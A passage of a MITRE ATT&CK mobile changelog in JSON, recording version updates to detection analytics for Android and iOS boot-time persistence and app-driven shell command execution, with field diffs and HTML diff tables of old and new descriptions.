                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to139__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to139__0\"><a href=\"#difflib_chg_to139__top\">t</a></td><td class=\"diff_header\" id=\"from139_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">On&nbsp;Android,&nbsp;Verified&nbsp;Boot&nbsp;can&nbsp;detect&nbsp;unauthorized&nbsp;modificati</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to139__top\">t</a></td><td class=\"diff_header\" id=\"to139_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;anomalous&nbsp;modifications&nbsp;to&nbsp;boot-time&nbsp;or&nbsp;logon-tim</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ons&nbsp;to&nbsp;the&nbsp;system&nbsp;partition.(Citation:&nbsp;Android-VerifiedBoot)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;initialization&nbsp;artifacts&nbsp;(for&nbsp;example,&nbsp;init.rc,&nbsp;vendor&nbsp;ini</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Android's&nbsp;SafetyNet&nbsp;API&nbsp;provides&nbsp;remote&nbsp;attestation&nbsp;capabil</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">t&nbsp;scripts,&nbsp;app_process&nbsp;or&nbsp;shell&nbsp;hijacks,&nbsp;and&nbsp;malicious&nbsp;BOOT_</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ities,&nbsp;which&nbsp;could&nbsp;potentially&nbsp;be&nbsp;used&nbsp;to&nbsp;identify&nbsp;and&nbsp;respo</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">COMPLETED&nbsp;BroadcastReceivers)&nbsp;with&nbsp;subsequent&nbsp;unauthorized&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nd&nbsp;to&nbsp;compromise&nbsp;devices.&nbsp;Samsung&nbsp;Knox&nbsp;provides&nbsp;a&nbsp;similar&nbsp;re</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cript&nbsp;execution&nbsp;after&nbsp;boot.&nbsp;From&nbsp;the&nbsp;defender\u2019s&nbsp;perspective&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">mote&nbsp;attestation&nbsp;capability&nbsp;on&nbsp;supported&nbsp;Samsung&nbsp;devices.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">this&nbsp;appears&nbsp;as&nbsp;integrity&nbsp;or&nbsp;attestation&nbsp;failures&nbsp;on&nbsp;the&nbsp;sys</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tem&nbsp;partition,&nbsp;unexpected&nbsp;writes&nbsp;to&nbsp;protected&nbsp;init&nbsp;paths,&nbsp;ne</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">w&nbsp;apps&nbsp;registering&nbsp;for&nbsp;boot&nbsp;events,&nbsp;and&nbsp;privileged&nbsp;processes</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;invoking&nbsp;scripts&nbsp;or&nbsp;binaries&nbsp;from&nbsp;non-standard&nbsp;locations&nbsp;sh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ortly&nbsp;after&nbsp;the&nbsp;device&nbsp;boots.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--007a370c-be77-49c9-9ca3-25d50de35864",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2025-12-04 17:05:14.687000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0654#AN1740",
                            "external_id": "AN1740"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1740",
                    "description": "Correlates unauthorized alterations to launchd configuration (LaunchDaemons/LaunchAgents plists), background execution entitlements, or sideloaded app containers with suspicious auto-start behavior during device boot or user unlock. From the defender\u2019s view this shows up as new or modified plist files in launchd directories, launchd starting binaries from non-Apple or non-AppStore locations, and apps with unexpected background modes that remain active immediately after boot/unlock.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
                            "name": "iOS:unifiedlog",
                            "channel": "Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "iOS:unifiedlog",
                            "channel": "launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--613788f2-ad72-43f5-b5f7-a93e2adc70fa",
                            "name": "iOS:unifiedlog",
                            "channel": "Application gaining or using unexpected background execution entitlements or modes"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "JailbreakIndicators",
                            "description": "List of filesystem paths or process names that identify intentionally jailbroken lab devices and should be handled differently."
                        },
                        {
                            "field": "LaunchdWhitelist",
                            "description": "Organization-specific list of allowed launchd job labels and binary paths."
                        },
                        {
                            "field": "AllowedBackgroundModes",
                            "description": "Per-app allow list for background execution modes (for example, VOIP, location) to reduce noise."
                        },
                        {
                            "field": "BootUnlockWindow",
                            "description": "Time window after boot or unlock within which unexpected launchd auto-starts are considered high risk."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"JailbreakIndicators\", \"description\": \"List of filesystem paths or process names that identify intentionally jailbroken lab devices and should be handled differently.\"}, {\"field\": \"LaunchdWhitelist\", \"description\": \"Organization-specific list of allowed launchd job labels and binary paths.\"}, {\"field\": \"AllowedBackgroundModes\", \"description\": \"Per-app allow list for background execution modes (for example, VOIP, location) to reduce noise.\"}, {\"field\": \"BootUnlockWindow\", \"description\": \"Time window after boot or unlock within which unexpected launchd auto-starts are considered high risk.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-12-04 17:05:14.687000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates unauthorized alterations to launchd configuration (LaunchDaemons/LaunchAgents plists), background execution entitlements, or sideloaded app containers with suspicious auto-start behavior during device boot or user unlock. From the defender\\u2019s view this shows up as new or modified plist files in launchd directories, launchd starting binaries from non-Apple or non-AppStore locations, and apps with unexpected background modes that remain active immediately after boot/unlock.\", \"old_value\": \"On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromise devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"iOS:unifiedlog\", \"channel\": \"launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--613788f2-ad72-43f5-b5f7-a93e2adc70fa\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Application gaining or using unexpected background execution entitlements or modes\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Android-VerifiedBoot\", \"description\": \"Android. (n.d.). Verified Boot. Retrieved December 21, 2016.\", \"url\": \"https://source.android.com/security/verifiedboot/\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to117__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to117__0\"><a href=\"#difflib_chg_to117__top\">t</a></td><td class=\"diff_header\" id=\"from117_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">On&nbsp;Android,&nbsp;Verified&nbsp;Boot&nbsp;can&nbsp;detect&nbsp;unauthorized&nbsp;modificati</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to117__top\">t</a></td><td class=\"diff_header\" id=\"to117_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;unauthorized&nbsp;alterations&nbsp;to&nbsp;launchd&nbsp;configuration</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ons&nbsp;to&nbsp;the&nbsp;system&nbsp;partition.(Citation:&nbsp;Android-VerifiedBoot)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;(LaunchDaemons/LaunchAgents&nbsp;plists),&nbsp;background&nbsp;execution&nbsp;e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Android's&nbsp;SafetyNet&nbsp;API&nbsp;provides&nbsp;remote&nbsp;attestation&nbsp;capabil</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ntitlements,&nbsp;or&nbsp;sideloaded&nbsp;app&nbsp;containers&nbsp;with&nbsp;suspicious&nbsp;au</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ities,&nbsp;which&nbsp;could&nbsp;potentially&nbsp;be&nbsp;used&nbsp;to&nbsp;identify&nbsp;and&nbsp;respo</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">to-start&nbsp;behavior&nbsp;during&nbsp;device&nbsp;boot&nbsp;or&nbsp;user&nbsp;unlock.&nbsp;From&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nd&nbsp;to&nbsp;compromise&nbsp;devices.&nbsp;Samsung&nbsp;Knox&nbsp;provides&nbsp;a&nbsp;similar&nbsp;re</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;defender\u2019s&nbsp;view&nbsp;this&nbsp;shows&nbsp;up&nbsp;as&nbsp;new&nbsp;or&nbsp;modified&nbsp;plist&nbsp;fil</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">mote&nbsp;attestation&nbsp;capability&nbsp;on&nbsp;supported&nbsp;Samsung&nbsp;devices.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">es&nbsp;in&nbsp;launchd&nbsp;directories,&nbsp;launchd&nbsp;starting&nbsp;binaries&nbsp;from&nbsp;no</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n-Apple&nbsp;or&nbsp;non-AppStore&nbsp;locations,&nbsp;and&nbsp;apps&nbsp;with&nbsp;unexpected&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">background&nbsp;modes&nbsp;that&nbsp;remain&nbsp;active&nbsp;immediately&nbsp;after&nbsp;boot/u</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nlock.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--a4242809-30bc-4c00-b247-b6cc11644a07",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 20:26:15.372000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0655#AN1741",
                            "external_id": "AN1741"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1741",
                    "description": "The defender correlates app-driven shell or command execution setup with subsequent process creation, command invocation, or script-driven follow-on behavior under the same app context, especially when command execution occurs from background state, without recent user interaction, or immediately after payload retrieval or local staging. The analytic prioritizes Android-observable control-plane effects: Java Runtime or similar command-execution method use, shell or sh-like process creation, command parameter visibility where available, and immediate file or network effects produced by the interpreter.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between command-launch method use, process creation, and follow-on file or network effects"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to run shell-like or administrative commands, such as enterprise support tools, terminal apps, approved EMM agents, or developer tooling"
                        },
                        {
                            "field": "AllowedProcessPatterns",
                            "description": "Expected command interpreters, process names, or parent-child execution chains for approved apps"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether command execution should occur only during active user-driven workflows"
                        },
                        {
                            "field": "CommandArgumentRiskPatterns",
                            "description": "Environment-specific list of suspicious command arguments, redirection usage, chaining operators, or shell-control syntax"
                        },
                        {
                            "field": "PostExecutionWriteThreshold",
                            "description": "Minimum number or size of file artifacts created after interpreter execution to increase confidence"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume after command execution to treat network behavior as meaningful"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between command-launch method use, process creation, and follow-on file or network effects\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to run shell-like or administrative commands, such as enterprise support tools, terminal apps, approved EMM agents, or developer tooling\"}, {\"field\": \"AllowedProcessPatterns\", \"description\": \"Expected command interpreters, process names, or parent-child execution chains for approved apps\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether command execution should occur only during active user-driven workflows\"}, {\"field\": \"CommandArgumentRiskPatterns\", \"description\": \"Environment-specific list of suspicious command arguments, redirection usage, chaining operators, or shell-control syntax\"}, {\"field\": \"PostExecutionWriteThreshold\", \"description\": \"Minimum number or size of file artifacts created after interpreter execution to increase confidence\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume after command execution to treat network behavior as meaningful\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 20:26:15.372000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates app-driven shell or command execution setup with subsequent process creation, command invocation, or script-driven follow-on behavior under the same app context, especially when command execution occurs from background state, without recent user interaction, or immediately after payload retrieval or local staging. The analytic prioritizes Android-observable control-plane effects: Java Runtime or similar command-execution method use, shell or sh-like process creation, command parameter visibility where available, and immediate file or network effects produced by the interpreter.\", \"old_value\": \"Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\nMobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells.\\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)\\nMobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1 @@\\n-Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\n-Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells.\\n-Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)\\n-Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.\\n+The defender correlates app-driven shell or command execution setup with subsequent process creation, command invocation, or script-driven follow-on behavior under the same app context, especially when command execution occurs from background state, without recent user interaction, or immediately after payload retrieval or local staging. The analytic prioritizes Android-observable control-plane effects: Java Runtime or similar command-execution method use, shell or sh-like process creation, command parameter visibility where available, and immediate file or network effects produced by the interpreter.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0\", \"name\": \"Command\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"Process\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Samsung Knox Mobile Threat Defense\", \"description\": \"Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.\", \"url\": \"https://partner.samsungknox.com/mtd\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1\", \"name\": \"Process\", \"channel\": \"None\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to157__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to157__0\"><a href=\"#difflib_chg_to157__top\">t</a></td><td class=\"diff_header\" id=\"from157_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Command-line&nbsp;activities&nbsp;can&nbsp;potentially&nbsp;be&nbsp;detected&nbsp;through&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to157__top\">t</a></td><td class=\"diff_header\" id=\"to157_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;app-driven&nbsp;shell&nbsp;or&nbsp;command&nbsp;executio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;integrations&nbsp;with&nbsp;lower-level&nbsp;OS</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;setup&nbsp;with&nbsp;subsequent&nbsp;process&nbsp;creation,&nbsp;command&nbsp;invocation</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;APIs.&nbsp;This&nbsp;could&nbsp;grant&nbsp;the&nbsp;MTD&nbsp;agents&nbsp;access&nbsp;to&nbsp;running&nbsp;pro</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;or&nbsp;script-driven&nbsp;follow-on&nbsp;behavior&nbsp;under&nbsp;the&nbsp;same&nbsp;app&nbsp;con</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">cesses&nbsp;and&nbsp;their&nbsp;parameters,&nbsp;potentially&nbsp;detecting&nbsp;unwanted&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">text,&nbsp;especially&nbsp;when&nbsp;command&nbsp;execution&nbsp;occurs&nbsp;from&nbsp;backgrou</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">or&nbsp;malicious&nbsp;shells.&nbsp;Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;with&nbsp;lower-</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nd&nbsp;state,&nbsp;without&nbsp;recent&nbsp;user&nbsp;interaction,&nbsp;or&nbsp;immediately&nbsp;af</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">level&nbsp;OS&nbsp;APIs&nbsp;integrations&nbsp;may&nbsp;have&nbsp;access&nbsp;to&nbsp;newly&nbsp;created&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ter&nbsp;payload&nbsp;retrieval&nbsp;or&nbsp;local&nbsp;staging.&nbsp;The&nbsp;analytic&nbsp;priorit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">processes&nbsp;and&nbsp;their&nbsp;parameters,&nbsp;potentially&nbsp;detecting&nbsp;unwant</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">izes&nbsp;Android-observable&nbsp;control-plane&nbsp;effects:&nbsp;Java&nbsp;Runtime&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ed&nbsp;or&nbsp;malicious&nbsp;shells.&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">or&nbsp;similar&nbsp;command-execution&nbsp;method&nbsp;use,&nbsp;shell&nbsp;or&nbsp;sh-like&nbsp;pr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">etect&nbsp;the&nbsp;invocations&nbsp;of&nbsp;methods&nbsp;that&nbsp;could&nbsp;be&nbsp;used&nbsp;to&nbsp;execu</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ocess&nbsp;creation,&nbsp;command&nbsp;parameter&nbsp;visibility&nbsp;where&nbsp;available</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">te&nbsp;shell&nbsp;commands.(Citation:&nbsp;Samsung&nbsp;Knox&nbsp;Mobile&nbsp;Threat&nbsp;Defe</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;and&nbsp;immediate&nbsp;file&nbsp;or&nbsp;network&nbsp;effects&nbsp;produced&nbsp;by&nbsp;the&nbsp;inte</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nse)&nbsp;Mobile&nbsp;Threat&nbsp;Defense&nbsp;(MTD)&nbsp;with&nbsp;lower-level&nbsp;OS&nbsp;APIs&nbsp;in</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rpreter.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tegrations&nbsp;may&nbsp;have&nbsp;access&nbsp;to&nbsp;running&nbsp;processes&nbsp;and&nbsp;their&nbsp;pa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td 